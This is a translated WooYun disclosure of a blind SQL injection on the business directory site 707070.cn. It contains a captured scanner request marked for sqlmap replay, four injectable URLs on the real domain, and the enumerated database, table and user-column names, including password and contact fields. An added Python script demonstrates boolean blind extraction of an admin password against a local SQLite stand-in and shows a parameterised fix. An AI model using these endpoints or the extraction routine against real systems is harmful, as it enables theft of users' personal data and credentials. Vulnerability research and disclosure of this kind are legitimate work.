
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-099054

Title: POST blind SQL injection on 707070 企领网

Vendor: 企领网

Author: 千斤拨四两

Submitted: 2015-03-03 14:16

Fixed/closed: 2015-04-17 14:18

Published: 2015-04-17 14:18

Type: SQL injection

Severity: High

Self-assessed rank: 15

Status: vendor could not be reached, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-03-03: Actively contacting the vendor and waiting for them to claim the report; details not disclosed
2015-04-17: The vendor has actively ignored the vulnerability; details disclosed to the public

Summary:

POST injection

Details:

Captured request. The `*` after `classid=3` is the injection-point marker used when a saved request is replayed with sqlmap (`-r`): the marked parameter is `classid` in the query string of this POST request. The `Acunetix-*` headers show the request was generated by an Acunetix WVS 8.0 scan, and the body (line-wrapped below by extraction) is the ASP.NET form post, most of it `__VIEWSTATE`.

POST /cyjq/index.aspx?classid=3*&page=2 HTTP/1.1
Content-Length: 7519
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: CheckCode=L0464
Host: www.707070.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Acunetix-Product: WVS/8.0 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
Accept: */*
Button1=&newskw=1&searchdomain=&top1%24headSearchType=chanpin&top1%24keywords=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=%2fwEPDwUKLTMxNTE4NTYyNA8WDh4EcGFnZQUBMh4FcGFnZTEFB%2bWIl%2bihqDIeBGlmZHEFASAeBUlEU3RyBQEzHgNwaWQFATAeBHBpZDEFATMeCHByb3ZpbmNlBQbmsrPljJcWAmYPZBYQZg8PFggeBHllYXIC3w8eBW1vbnRoAgIeA2RheQIcHgRkYXRlBRAyMDE15bm0MuaciDI45pelZBYGZg8WAh4EVGV4dAVmPGEgaHJlZj1odHRwOi8vd3d3LjcwNzA3MC5jbiAgdGFyZ2V0PSdfYmxhbmsnPue%2biuW5tOWkp%2bWQie%2b8jOWFg%2bWuteW%2fq%2bS5kCHmnKznq5nml6Xorr%2flrqLotoU15LiHSVA8L2E%2bZAIBDw9kFgQeCm9ua2V5cHJlc3MFG0VudGVyVGV4dEJveCgndG9wMV9TZWFyY2gnKR4HT25Gb2N1cwU0IGlmKHRoaXMudmFsdWU9PSfor7fovpPlhaXlhbPplK7lrZcnKXRoaXMudmFsdWU9Jyc7IGQCBA8WAh8LBWA8YSBocmVmPS9uZXdzL3Nob3ctMjY5NjQ1MS5odG1sICB0YXJnZXQ9J19ibGFuayc%2bMjAxNeW5tOWNgeWkp%2bW4guWcuuiQpemUgOacgOS4uumHjeimgeeahOWPkTwvYT5kAgEPFgIeC18hSXRlbUNvdW50AiIWRGYPZBYCZg8VAgExBuWMl%2bS6rGQCAQ9kFgJmDxUCATIG5aSp5rSlZAICD2QWAmYPFQIBMwbmsrPljJdkAgMPZBYCZg8VAgE0BuWxseilv2QCBA9kFgJmDxUCATUJ5YaF6JKZ5Y%2bkZAIFD2QWAmYPFQIBNgbovr3lroFkAgYPZBYCZg8VAgE3BuWQieael2QCBw9kFgJmDxUCATgJ6buR6b6Z5rGfZAIID2QWAmYPFQIBOQbkuIrmtbdkAgkPZBYCZg8VAgIxMAbmsZ%2foi49kAgoPZBYCZg8VAgIxMQbmtZnmsZ9kAgsPZBYCZg8VAgIxMgblronlvr1kAgwPZBYCZg8VAgIxMwbnpo%2flu7pkAg0PZBYCZg8VAgIxNAbmsZ%2fopb9kAg4PZBYCZg8VAgIxNQblsbHkuJxkAg8PZBYCZg8VAgIxNgbmsrPljZdkAhAPZBYCZg8VAgIxNwbmuZbljJdkAhEPZBYCZg8VAgIxOAbmuZbljZdkAhIPZBYCZg8VAgIxOQblub%2fkuJxkAhMPZBYCZg8VAgIyMAblub%2fopb9kAhQPZBYCZg8VAgIyMQbmtbfljZdkAhUPZBYCZg8VAgIyMgbph43luoZkAhYPZBYCZg8VAgIyMwblm5vlt51kAhcPZBYCZg8VAgIyNAbotLXlt55kAhgPZBYCZg8VAgIyNQbkupHljZdkAhkPZBYCZg8VAgIyNgbopb%2fol49kAhoPZBYCZg8VAgIyNwbpmZXopb9kAhsPZBYCZg8VAgIyOAbnlJjogoNkAhwPZBYCZg8VAgIyOQbpnZLmtbdkAh0PZBYCZg8VAgIzMAblroHlpI9kAh4PZBYCZg8VAgIzMQbmlrDnloZkAh8PZBYCZg8VAgIzMgblj7Dmub5kAiAPZBYCZg8VAgIzMwbpppnmuK9kAiEPZBYCZg8VAgIzNAbmvrPpl6hkAgIPFgIfDgILFhZmD2QWAmYPFQICMzUM55%2bz5a625bqE5biCZAIBD2QWAmYPFQICMzYJ5ZSQ5bGx5biCZAICD2QWAmYPFQICMzcM56em55qH5bKb5biCZAIDD2QWAmYPFQICMzgJ6YKv6YO
45biCZAIED2QWAmYPFQICMzkJ6YKi5Y%2bw5biCZAIFD2QWAmYPFQICNDAJ5L%2bd5a6a5biCZAIGD2QWAmYPFQICNDEM5byg5a625Y%2bj5biCZAIHD2QWAmYPFQICNDIJ5om%2f5b635biCZAIID2QWAmYPFQICNDMJ5rKn5bee5biCZAIJD2QWAmYPFQICNDQJ5buK5Z2K5biCZAIKD2QWAmYPFQICNDUJ6KGh5rC05biCZAIDDxYCHgdWaXNpYmxlaGQCBA8WAh8OAgwWGGYPZBYCZg8VBQMyMzkCMTUb5piM6buO5Y6%2f55Wc54mn5Lqn5Lia6ZuG576kBuays%2bWMlwznp6bnmoflspvluIJkAgEPZBYCZg8VBQMxMzYCMTQi5bGx5rW35YWz6YeR5bGe5p2Q5paZ5Lqn5Lia6ZuG576kIAbmsrPljJcM56em55qH5bKb5biCZAICD2QWAmYPFQUDMTQzAjEzJ%2ba1t%2ba4r%2beOu%2beSg%2bWPiuWFtua3seWKoOW3peS6p%2bS4mumbhue%2bpAbmsrPljJcM56em55qH5bKb5biCZAIDD2QWAmYPFQUDMzIyAjEyKuenpueah%2bWym%2beyruayuemjn%2bWTgeWKoOW3peS4muS6p%2bS4mumbhue%2bpAbmsrPljJcM56em55qH5bKb5biCZAIED2QWAmYPFQUDMzIxAjExH%2bWNoum%2bmeacuuaisOWItumAoOS6p%2bS4mumbhue%2bpCAG5rKz5YyXDOenpueah%2bWym%2bW4gmQCBQ9kFgJmDxUFAjc3AjEwGeaKmuWugeawtOazpeS6p%2bS4mumbhue%2bpCAG5rKz5YyXDOenpueah%2bWym%2bW4gmQCBg9kFgJmDxUFAzI4NwE5GOWNoum%2bmeeUmOiWr%2bS6p%2bS4mumbhue%2bpAbmsrPljJcM56em55qH5bKb5biCZAIHD2QWAmYPFQUDMjg1ATgi5YyX5oi05rKz5paH5YyW5Yib5oSP5Lqn5Lia6ZuG576kIAbmsrPljJcM56em55qH5bKb5biCZAIID2QWAmYPFQUDMzIxATcn5piM6buO5aSn6JKy5rKz546J57Gz572Q5aS05Lqn5Lia6ZuG576kBuays%2bWMlwznp6bnmoflspvluIJkAgkPZBYCZg8VBQMzMjUBNifnp6bnmoflspvmsb3ovablj4rpm7bpg6jku7bkuqfkuJrpm4bnvqQG5rKz5YyXDOenpueah%2bWym%2bW4gmQCCg9kFgJmDxUFAzIzNgE1KuaYjOm7juWOv%2bWQjuWPjOe8nee6q%2bacuumbtuS7tuS6p%2bS4mumbhue%2bpAbmsrPljJcM56em55qH5bKb5biCZAILD2QWAmYPFQUDMjMwATQXIOWUkOWxsemZtueTt%2bS6p%2bS4mue%2bpCAG5rKz5YyXCeWUkOWxseW4gmQCBQ8PFg4eCVVybFBhZ2luZ2ceCFBhZ2VTaXplAgweC1JlY29yZGNvdW50AhkeDFVybFJld3JpdGluZ2ceEEN1cnJlbnRQYWdlSW5kZXgCAh4OQ3VzdG9tSW5mb1RleHQFggHlvZPliY3nrKw8Zm9udCBjb2xvcj0nI2ZmODgwMCc%2bMjwvZm9udD4vM%2bmhtSAg5YWxPGZvbnQgY29sb3I9JyNmZjg4MDAnPjI1PC9mb250PuadoeiusOW9lSDmr4%2fpobU8Zm9udCBjb2xvcj0nI2ZmODgwMCc%2bMTI8L2ZvbnQ%2b5p2hHglVUlBhdHRlcm4FEGxpc3QtMy1wezB9Lmh0bWxkZAIIDxYCHw4CChYUZg9kFgJmDxUDJ%2bmrmOaWsOWMuuW0m%2bi1t%2bWNq%2baYn%2bmAmuS%2foeS6p%2bS4mumbhue%2bpAcyNjk1ODU2J%2bmrmOaWsOWMuuW0m%2bi1t%2bWNq%2baYn%2bm
AmuS%2foeS6p%2bS4mumbhue%2bpGQCAQ9kFgJmDxUDNuaOouaygumVh%2baJk%2bmAoOS4tOayguadv%2badkOWutuWFt%2bS6p%2bS4mumbhue%2bpOaguOW%2fg%2bWMugcyNjk1ODU1LeaOouaygumVh%2baJk%2bmAoOS4tOayguadv%2badkOWutuWFt%2bS6p%2bS4mumbhue%2bpGQCAg9kFgJmDxUDMOacieWFs%2bS4iueKuemhueebruW8uuWfuuWjruWkp%2bS6p%2bS4mumbhue%2bpOi1hOiurwcyNjk1ODU0LeacieWFs%2bS4iueKuemhueebruW8uuWfuuWjruWkp%2bS6p%2bS4mumbhue%2bpOi1hGQCAw9kFgJmDxUDIeWGnOS4muS6p%2bS4mumbhue%2bpOimgeaJqeWkp%2binhOaooQcyNjk1ODUzIeWGnOS4muS6p%2bS4mumbhue%2bpOimgeaJqeWkp%2binhOaooWQCBA9kFgJmDxUDPTIwMTXkuqfkuJrpm4bogZrljLrovazlnovljYfnuqfkuJPpobnooYzliqjorqHliJLmraPlvI%2flkK%2fliqgHMjY5NTg1MisyMDE15Lqn5Lia6ZuG6IGa5Yy66L2s5Z6L5Y2H57qn5LiT6aG56KGM5YqoZAIFD2QWAmYPFQMw5YWI6L%2bb57uP6aqM5o6o5Yqo5Lqn5Lia5Y2H57qn5YC85b6X5oiR5Lus5a2m5LmgBzI2OTU4NTEt5YWI6L%2bb57uP6aqM5o6o5Yqo5Lqn5Lia5Y2H57qn5YC85b6X5oiR5Lus5a2mZAIGD2QWAmYPFQM25YGl5bq356eR5oqA77ya5Lit5bGx5YGl5bq356eR5oqA5Yib5paw5Z6L5Lqn5Lia6ZuG576kBzI2OTU4NTAt5YGl5bq356eR5oqA77ya5Lit5bGx5YGl5bq356eR5oqA5Yib5paw5Z6L5LqnZAIHD2QWAmYPFQM15o2u5oql6YGT77yM5LuK5bm06YeN54K55o6o6L%2bbNjDkuKrkuqfkuJrpm4bnvqTlj5HlsZUHMjY5NTg0OSzmja7miqXpgZPvvIzku4rlubTph43ngrnmjqjov5s2MOS4quS6p%2bS4mumbhmQCCA9kFgJmDxUDOOaJk%2bmAoOmrmOerr%2bS6p%2bS4mumbhue%2bpCAg5o6o6L%2bb5YWI6KGM5YWI6K%2bV5pS56Z2p5Lu75YqhBzI2OTU4NDgs5omT6YCg6auY56uv5Lqn5Lia6ZuG576kICDmjqjov5vlhYjooYzlhYjor5VkAgkPZBYCZg8VAzbigJzms6Xohb%2flt6jkurrigJ3miJDkuLrpm4bnvqTpvpnlpLTkvIHkuJrnmoTku6PlkI3or40HMjY5NTg0Ny3igJzms6Xohb%2flt6jkurrigJ3miJDkuLrpm4bnvqTpvpnlpLTkvIHkuJrnmoRkAgkPFgIfDgIKFhRmD2QWAgIBDxYCHwsFbTxBIGhyZWY9Jy96ZmNnL3Nob3ctYzE5Ny5odG1sJyB0aXRsZT3lub%2flt57mlL%2flupzph4fotK3nvZEgc3R5bGU9J2ZvbnQtc2l6ZToxNHB4OycgPuW5v%2bW3nuaUv%2bW6nOmHh%2bi0ree9kTwvQT5kAgEPZBYCAgEPFgIfCwWPATxBIGhyZWY9Jy96ZmNnL3Nob3ctcDMuaHRtbCcgdGl0bGU95bm%2f6KW%2f5aOu5peP6Ieq5rK75Yy65pS%2f5bqc6YeH6LSt5Lit5b%2bDIHN0eWxlPSdmb250LXNpemU6MTRweDsnID7lub%2fopb%2flo67ml4%2foh6rmsrvljLrmlL%2flupzph4fotK3kuK3lv4M8L0E%2bZAICD2QWAgIBDxYCHwsFazxBIGhyZWY9Jy96ZmNnL3Nob3ctMjUuaHRtbCcgdGl0bGU95pS%2f5bqc6Ye
H6LSt5L%2bh5oGv572RIHN0eWxlPSdmb250LXNpemU6MTRweDsnID7mlL%2flupzph4fotK3kv6Hmga%2fnvZE8L0E%2bZAIDD2QWAgIBDxYCHwsFcjxBIGhyZWY9Jy96ZmNnL3Nob3ctYzg3Lmh0bWwnIHRpdGxlPeadreW3nuW4guaUv%2bW6nOmHh%2bi0ree9kSBzdHlsZT0nZm9udC1zaXplOjE0cHg7JyA%2b5p2t5bee5biC5pS%2f5bqc6YeH6LSt572RPC9BPmQCBA9kFgICAQ8WAh8LBYoBPEEgaHJlZj0nL3pmY2cvc2hvdy1wMjQuaHRtbCcgdGl0bGU95YaF6JKZ5Y%2bk6Ieq5rK75Yy65pS%2f5bqc6YeH6LSt5Lit5b%2bDIHN0eWxlPSdmb250LXNpemU6MTRweDsnID7lhoXokpnlj6Toh6rmsrvljLrmlL%2flupzph4fotK3kuK3lv4M8L0E%2bZAIFD2QWAgIBDxYCHwsFcTxBIGhyZWY9Jy96ZmNnL3Nob3ctcDQuaHRtbCcgdGl0bGU95rW35Y2X5pS%2f5bqc6YeH6LSt5Lit5b%2bDIHN0eWxlPSdmb250LXNpemU6MTRweDsnID7mtbfljZfmlL%2flupzph4fotK3kuK3lv4M8L0E%2bZAIGD2QWAgIBDxYCHwsFeTxBIGhyZWY9Jy96ZmNnL3Nob3ctYzIwMC5odG1sJyB0aXRsZT3nj6DmtbfluILmlL%2flupzph4fotK3kuK3lv4Mgc3R5bGU9J2ZvbnQtc2l6ZToxNHB4OycgPuePoOa1t%2bW4guaUv%2bW6nOmHh%2bi0reS4reW%2fgzwvQT5kAgcPZBYCAgEPFgIfCwV3PEEgaHJlZj0nL3pmY2cvc2hvdy0yMS5odG1sJyB0aXRsZT3kuK3lm73mlL%2flupzph4fotK3noJTnqbbmiYAgc3R5bGU9J2ZvbnQtc2l6ZToxNHB4OycgPuS4reWbveaUv%2bW6nOmHh%2bi0reeglOeptuaJgDwvQT5kAggPZBYCAgEPFgIfCwV%2bPEEgaHJlZj0nL3pmY2cvc2hvdy1wMTQuaHRtbCcgdGl0bGU96L695a6B55yB5pS%2f5bqc6ZuG5Lit6YeH6LSt572RIHN0eWxlPSdmb250LXNpemU6MTRweDsnID7ovr3lroHnnIHmlL%2flupzpm4bkuK3ph4fotK3nvZE8L0E%2bZAIJD2QWAgIBDxYCHwsFbDxBIGhyZWY9Jy96ZmNnL3Nob3ctcDE3Lmh0bWwnIHRpdGxlPemdkua1t%2baUv%2bW6nOmHh%2bi0ree9kSBzdHlsZT0nZm9udC1zaXplOjE0cHg7JyA%2b6Z2S5rW35pS%2f5bqc6YeH6LSt572RPC9BPmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFB0J1dHRvbjHFC%2beJEn5h8jYo339cogMrTqzQPg%3d%3d


http://www.707070.cn/ajax/newspj.aspx?aid=2696455&id=good&time=1425106320821
http://www.707070.cn/ajax/vote.aspx?id=good&time=1425106335576&vid=37
http://www.707070.cn/cyjq/index.aspx?classid=3&page=2
http://www.707070.cn//news/list.aspx?classid=1
All of the above are injectable.
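As an added example (not part of the original report and not the site's own code), the following Python script simulates the boolean-based blind technique behind the `classid` injection above against an in-memory SQLite stand-in for the site's SQL Server database. The `news` table, the single `fj_70usercaiji` row and both page-handler functions are constructed here as assumptions; only the table and column names are taken from the dump below. SQLite's `unicode()`/`substr()` play the role of SQL Server's `ASCII()`/`SUBSTRING()`. The vulnerable handler concatenates the parameter into the query text; the hardened one parses it as an integer and binds it as a parameter, which is the fix the report leaves unstated.

```python
import sqlite3
from typing import Callable


# Constructed stand-in for the site's database (assumption: the real schema is
# unknown; only the table/column names come from the report's dump).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, classid INTEGER, title TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(1, 3, "article one"), (2, 3, "article two"), (3, 1, "other class")],
    )
    conn.execute(
        "CREATE TABLE fj_70usercaiji (user_id INTEGER, username TEXT, password TEXT)"
    )
    conn.execute("INSERT INTO fj_70usercaiji VALUES (1, 'admin', 's3cret')")
    return conn


# Hypothetical model of /cyjq/index.aspx?classid=...: the query-string value is
# concatenated into the SQL text, which is what makes classid injectable.
# Returns True when the page would render at least one row (the blind oracle).
def vulnerable_list(conn: sqlite3.Connection, classid: str) -> bool:
    sql = "SELECT id, title FROM news WHERE classid=" + classid
    return len(conn.execute(sql).fetchall()) > 0


# Hardened version: parse the id and bind it as a parameter. Any payload that
# is not a plain integer is rejected before it reaches the database.
def hardened_list(conn: sqlite3.Connection, classid: str) -> bool:
    try:
        value = int(classid)
    except ValueError:
        return False
    rows = conn.execute("SELECT id, title FROM news WHERE classid=?", (value,))
    return len(rows.fetchall()) > 0


Oracle = Callable[[sqlite3.Connection, str], bool]


def extract(oracle: Oracle, conn: sqlite3.Connection, subquery: str, max_len: int = 64) -> str:
    """Boolean-based blind extraction of the scalar returned by `subquery`.

    The page is the oracle: it renders rows (True) or not (False). Each
    character is recovered by binary search on its code point, so 7 probes
    per character instead of up to 128. On SQL Server the same probe would use
    ASCII(SUBSTRING(...)) in place of SQLite's unicode(substr(...)).
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        # Is there a character at `pos` at all? unicode('') is NULL in SQLite,
        # so the comparison is false once we run past the end of the string.
        if not oracle(conn, f"3 AND unicode(substr(({subquery}),{pos},1))>0"):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"3 AND unicode(substr(({subquery}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


ADMIN_PASSWORD_QUERY = "SELECT password FROM fj_70usercaiji WHERE username='admin'"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler leaks:", repr(extract(vulnerable_list, db, ADMIN_PASSWORD_QUERY)))
    print("hardened handler leaks:  ", repr(extract(hardened_list, db, ADMIN_PASSWORD_QUERY)))
```

Against the vulnerable handler the script recovers the constructed password one character at a time from nothing but "rows / no rows"; against the hardened handler the first probe is rejected by `int()` and nothing is recovered. The same oracle shape applies to the other endpoints listed above, only the base value and the parameter name change.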


Database information:

available databases [11]:
[*] 33fanwennew
[*] 70
[*] 70yule
[*] jinghua
[*] master
[*] model
[*] msdb
[*] shangcheng
[*] tempdb
[*] tfsbfj
[*] tfsbqiye
Database: 70
[289 tables]
+--------------------------+
| Canshou |
| IPTABLE |
| Kind |
| NM_LoginInfo |
| S_City |
| S_District |
| S_Province |
| TB_Menu |
| UpdateNewsContentjilu |
| View_compro |
| View_indexpj |
| View_khlx |
| View_otherpro |
| View_pjlist |
| View_pjsalepx |
| View_proclass |
| View_proclass |
| View_salepx |
| View_salexx |
| View_samplelist |
| View_tb_user |
| View_userdep |
| fj_user0-3 |
| fj_user0-3 |
| fj_user11-13 |
| fj_user13-15 |
| fj_user15-17 |
| fj_user3-5 |
| fj_user5-7 |
| fj_user7-9 |
| fj_user9-11 |
| address |
| administrator |
| annualrevenue |
| aprofiletemp |
| baojia |
| biztype |
| chanpincontentjilu |
| commend |
| companysize |
| dtproperties |
| fj_70usercaiji |
| fj_usercaiji |
| fj_userdelete |
| fj_userhangye |
| fj_userlist |
| fj_usernew |
| fj_usersearch |
| fj_usertemp |
| insertcgsjilu |
| interview |
| jbright_article_cyjq |
| jbright_article_cyjq |
| jbright_article_qysp |
| jbright_article_zfcg |
| jbright_articlebf |
| jbright_articleminglu |
| jbright_articlemobi |
| jbright_articletest |
| jbright_secret |
| kh_33qiyenews |
| kh_70news |
| kh_70otherprotemp |
| kh_City |
| kh_District |
| kh_Province |
| kh_adminlog |
| kh_al |
| kh_anli |
| kh_areacode |
| kh_article2 |
| kh_article2 |
| kh_articleclass2 |
| kh_articleclass2 |
| kh_articleclass3com |
| kh_articleclass3com |
| kh_articleclass3pro |
| kh_articleclass3temp |
| kh_articlelink |
| kh_articletemp |
| kh_az |
| kh_bspmax |
| kh_bspmaxtemp |
| kh_bzclass |
| kh_bzclass |
| kh_caigouclass |
| kh_caigouclass |
| kh_caijipub |
| kh_cgly |
| kh_cgmsg |
| kh_cgsbd |
| kh_cgsbd |
| kh_cgsiduserid |
| kh_cgsuser |
| kh_chanye |
| kh_chanyesf |
| kh_chengguo |
| kh_chengyu |
| kh_classkw1 |
| kh_classkw1 |
| kh_classkw2 |
| kh_classprokw2 |
| kh_comlz |
| kh_compj |
| kh_comproclass |
| kh_comtest |
| kh_cpzt |
| kh_cpztxg |
| kh_delcgs |
| kh_delchanpin |
| kh_delly |
| kh_email |
| kh_esxx |
| kh_fjpro |
| kh_fjuser |
| kh_ftjf |
| kh_gbook |
| kh_getpwd |
| kh_gongyijigou |
| kh_gongyijigou |
| kh_gongyinews |
| kh_gongyiyulu |
| kh_history |
| kh_huafei |
| kh_hyjhcg |
| kh_hytop2offer |
| kh_hz |
| kh_indexarticle |
| kh_indexcom |
| kh_indexpro |
| kh_ip |
| kh_jflist |
| kh_jhaoyou |
| kh_jhcg |
| kh_jl |
| kh_jobclass |
| kh_jobclass |
| kh_joinnum |
| kh_kh |
| kh_khzl |
| kh_kjbuchong |
| kh_kjtz |
| kh_lastlf |
| kh_lbchuli |
| kh_link_mlzx |
| kh_link_mlzx |
| kh_linkqy |
| kh_ljlb |
| kh_luck |
| kh_ly |
| kh_minglumes |
| kh_mingyan |
| kh_msg |
| kh_nametest |
| kh_newspj |
| kh_otherarticle |
| kh_otherdzyb |
| kh_otherprobf |
| kh_otherprobf |
| kh_otherprocandel |
| kh_otherprotemp |
| kh_otherprozishujiaoshao |
| kh_pjcaozuo |
| kh_pjclass |
| kh_pl |
| kh_proclass1 |
| kh_proclass1 |
| kh_proclass2 |
| kh_proclass3 |
| kh_proclassshuxing |
| kh_prokwcandel |
| kh_prolbchuli1 |
| kh_prolbchuli1 |
| kh_propj |
| kh_proshuxinglist |
| kh_proshuxinglist |
| kh_qiyetag |
| kh_qq |
| kh_qyhd |
| kh_qyhd |
| kh_randarticle |
| kh_randlink |
| kh_randprolink |
| kh_rdhtnews |
| kh_rdhtnews |
| kh_renzheng |
| kh_rzpj |
| kh_searchkh |
| kh_sendemail |
| kh_sgmes |
| kh_shybook |
| kh_sjy |
| kh_sor |
| kh_splink |
| kh_sppj |
| kh_syscanshu |
| kh_sysset |
| kh_tagclass |
| kh_tbclass |
| kh_temp1 |
| kh_temp1 |
| kh_temp2 |
| kh_tempclasskw |
| kh_tempdelpro |
| kh_tempproclasskw |
| kh_tempproclasskw |
| kh_tjcgs |
| kh_tjoffer |
| kh_tjpro |
| kh_tongjimember |
| kh_tongjimember |
| kh_tongjiqiantai |
| kh_tophd |
| kh_tougao |
| kh_updatepro |
| kh_user4 |
| kh_userlink |
| kh_userlog |
| kh_usermenu |
| kh_usernum |
| kh_usershuxing |
| kh_usersonmenu |
| kh_vistior |
| kh_votemingpian |
| kh_votemingpian |
| kh_votepjmingpian |
| kh_votepjmingpian |
| kh_weibo |
| kh_wymsg |
| kh_xc |
| kh_xguser |
| kh_xgusertemp |
| kh_xiaohua |
| kh_xiaotu |
| kh_xmcs |
| kh_xunrencs |
| kh_xunrencs |
| kh_xunrenpl |
| kh_xxautogengxin |
| kh_xxcaozu |
| kh_xxclassminglu |
| kh_xxclassminglu |
| kh_xxcom |
| kh_xxkw |
| kh_xykjlf |
| kh_yqlj |
| kh_yyclass |
| kh_zfcg |
| kh_zfclass |
| kh_zhanhui |
| kh_zhishuset |
| kh_zhuanjia |
| kh_zhufu |
| kh_ziliaoclass |
| kh_ziliaoclass |
| kh_zipcode |
| kh_zixun |
| kh_zjhf |
| kh_zjlog |
| kh_zlclass |
| kh_zlclass |
| kh_zlmm |
| kh_zlpj |
| kh_zs |
| kh_zt |
| kh_zzad |
| kwad |
| liuyanall |
| liuyanall |
| liuyanmingpian |
| pangolin_test_table |
| pjoffer |
| principalship |
| product_company |
| product_sonsort |
| product_sort |
| province |
| provincetemp |
| s_bpic |
| s_spic |
| searchkw |
| shangyu |
| shoucang |
| topic_type |
| updatecardlogodatajilu |
| updatecardtimejiluflag |
| updatecardtimejiluflag |
| updatejilu |
| yjtg_tophd |
+--------------------------+
Database: 70
Table: fj_70usercaiji
[156 columns]
+-------------------+
| Column |
+-------------------+
| adddate |
| address |
| age |
| annualrevenue_id |
| answer |
| bad |
| biztype_id |
| bz1 |
| c |
| caozuo |
| caozuoadddate |
| caozuoadddate1 |
| cgpro |
| cgsid |
| chandi |
| city |
| comadddate |
| comms |
| companyname |
| companypage |
| companysize_id |
| companysizeqt |
| complace |
| crmcontent |
| d |
| delnum |
| departname |
| email |
| ewm |
| ewmsize |
| faren |
| fax |
| fjuserid |
| fsdate |
| gender |
| good |
| grade |
| grade_pass |
| grade_passaddyear |
| grade_passdate |
| guimo |
| gz |
| hangye |
| hits |
| hytype |
| ifcgs |
| ifcl |
| iffs |
| iffs3 |
| iftop |
| ifts |
| ifxz |
| img |
| imgcaozuo |
| IP |
| jf |
| jhqgid |
| jianjie |
| jobtitle |
| jointime |
| jyms |
| khlevel |
| khorder |
| khtype |
| lastloghyzx |
| lastlogtime |
| lastlxdate |
| lastpjdate |
| lastxxdate |
| lastztdate |
| loglx |
| lognum |
| membertype |
| mfnum |
| mmfj |
| mmfjtjhy |
| modidate |
| mpassnum |
| msgread |
| msn |
| myid |
| myid1 |
| nextlx |
| nickname |
| nothy |
| noxxts |
| othercpid |
| otherpjid |
| otherybid |
| p |
| paddress |
| pass |
| passnum |
| password |
| pcompanyname |
| pemail |
| pfax |
| phone |
| pmphone |
| point |
| postcode |
| pprofile |
| pqq |
| principalship |
| principalship_id |
| profile |
| province_id |
| ptel |
| qq |
| qqid |
| question |
| see |
| session |
| sex |
| shangye |
| sinaid |
| smdate |
| smpass |
| sqdate |
| suozaidi |
| telnum |
| TitleColor |
| TitleColor1 |
| tjhy |
| tjzj |
| truename |
| ucenterstyle |
| ucenterword |
| user_checked |
| user_id |
| user_mark |
| user_rongyu |
| user_rongyu_intro |
| user_style |
| user_zizhi |
| user_zizhi_intro |
| username |
| UserTopicCount |
| xcy |
| xcy1 |
| xueli |
| yes1 |
| yes2 |
| yes3 |
| yye |
| yz |
| yzok |
| z1 |
| zclb |
| zhic |
| zhiw |
| zijin |
| zy |
| zyhangye |
| zynum |
| zypro |
+-------------------+
The data volume is large. (Note: master, model, msdb and tempdb are SQL Server system databases, so the backend is MSSQL; and the pangolin_test_table entry in the table list is the scratch table left behind by the Pangolin injection tool, which suggests this database had already been probed with an automated injection tool before this report.)


Proof:

[Screenshots dd.png, ttt.png and p.jpg not reproduced]

Fix recommendation:

Counting on you...

Copyright notice: when reposting, credit the source: 千斤拨四两@乌云


Vulnerability response

Vendor reply:

Vendor could not be reached, or the vendor actively refused.